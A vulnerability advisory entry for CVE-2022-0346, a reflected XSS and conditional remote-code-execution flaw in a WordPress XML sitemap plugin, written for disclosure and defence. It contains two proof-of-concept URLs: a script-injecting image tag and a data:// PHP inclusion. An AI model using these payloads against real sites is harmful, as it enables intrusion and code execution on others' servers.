Google XML Sitemap Generator < 2.0.4 – Reflected Cross-Site Scripting | CVE 2022-0346 | Plugin Vulnerabilities

Description

The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.

Proof of Concept

XSS: https://example.com/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp
RCE (when allow_url_include is on):  https://example.com/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp

Affects Plugins

www-xml-sitemap-generator-org

Fixed in 2.0.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

4b339390-d71a-44e0-8682-51a12bd2bfe6

Timeline

Publicly Published

2022-05-02 (about 3 years ago)

Added

2022-05-02 (about 3 years ago)

Last Updated

2022-05-02 (about 3 years ago)

Other

Published

Title

Published

2025-09-23

Title

WorkScout-Core < 1.7.06 - Reflected Cross-Site Scripting

Published

2025-05-02

Title

Xavin's Review Ratings <= 1.4.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-07-11

Title

Change From Email <= 1.2.1 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-01-05

Title

EventON < 4.4.1 - Reflected Cross-Site Scripting

Published

2024-11-20

Title

ForumEngine < 1.9 - Reflected Cross-Site Scripting